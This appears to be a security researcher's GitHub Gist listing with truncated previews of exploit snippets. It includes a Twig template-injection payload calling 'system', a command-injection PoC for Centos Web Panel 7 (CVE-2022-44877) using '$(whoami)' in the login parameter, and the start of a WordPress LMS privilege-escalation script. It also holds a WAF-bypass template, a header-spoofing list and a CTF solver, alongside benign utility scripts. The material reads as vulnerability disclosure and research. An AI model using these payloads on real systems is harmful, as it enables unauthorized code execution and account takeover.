numan numanturle

@numanturle
numanturle / 1.twig
Created March 23, 2023 22:32
twig blacklist [ ]
{%set x={'1':'id'}%}{{x|filter('system')}}
numanturle / # Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877
Created January 5, 2023 21:44
# Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877
[+] Centos Web Panel 7 Unauthenticated Remote Code Execution
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
POST /filemanager/controller HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 141
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0 
Content-Type: application/json;charset=UTF-8
# Title: gSOAP 2.8 - Directory Traversal
# Author: Numan Türle
# Date: 2019-11-13
# Vendor Homepage: https://www.genivia.com/
# Version : gSOAP 2.8
# Software Link : https://www.genivia.com/products.html#gsoap
POC
---------
numanturle / Exploit.js
Created January 30, 2022 10:51
MasterStudy LMS – WordPress LMS Plugin 2.7.5 - Privilege Escalation (Unauthenticated)
function randomInt(min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}
jQuery(document).ready(function($){
    username = "poctesting"+randomInt(1,1337);
    password_poc = "S3cr3t"+randomInt(1,1337);
    nonce = stm_lms_nonces.stm_lms_register
    post_data = {
numanturle / waf.yaml
Created August 29, 2022 11:15
waf.yaml
id: waf-bypass-numi
info:
  name: waf-bypass-numi
  author: numanture
requests:
  - raw:
      - |
        GET /blabla HTTP/1.1
numanturle / elasticsearch.py
Created August 25, 2021 14:43
elasticsearch
import json
import sys
from time import sleep
from datetime import datetime
from elasticsearch import Elasticsearch, helpers
es = Elasticsearch("localhost:9200")
def create_index(index):
    es.indices.create(index=index, ignore=400)
numanturle / solve-paradigm.py
Last active August 27, 2022 22:03
solve-paradigm.py
from solcx import compile_source
from web3 import Web3
setup_txt = open("Setup.sol", "r").read()
setup_compiled_source = compile_source(setup_txt, output_values=['abi'])
setup_abi = list(setup_compiled_source.items())[0][1]['abi']
random_txt = open("Random.sol", "r").read()
random_compiled_source = compile_source(random_txt, output_values=['abi'])
random_abi = list(random_compiled_source.items())[0][1]['abi']
numanturle / cloudflare-real.sh
Last active August 9, 2022 09:00
cloudflare real ip
#!/bin/bash
# Simple bash script to restore visitor real IP under Cloudflare with Nginx
# The script also whitelists Cloudflare IPs with UFW (if installed)
if [ "$1" = "--ufw" ]; then
    CF_UFW_SETUP="y"
fi
if [ -z "$(command -v curl)" ]; then
    echo "####################################"
numanturle / req.req
Created August 8, 2022 10:45
req.req
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1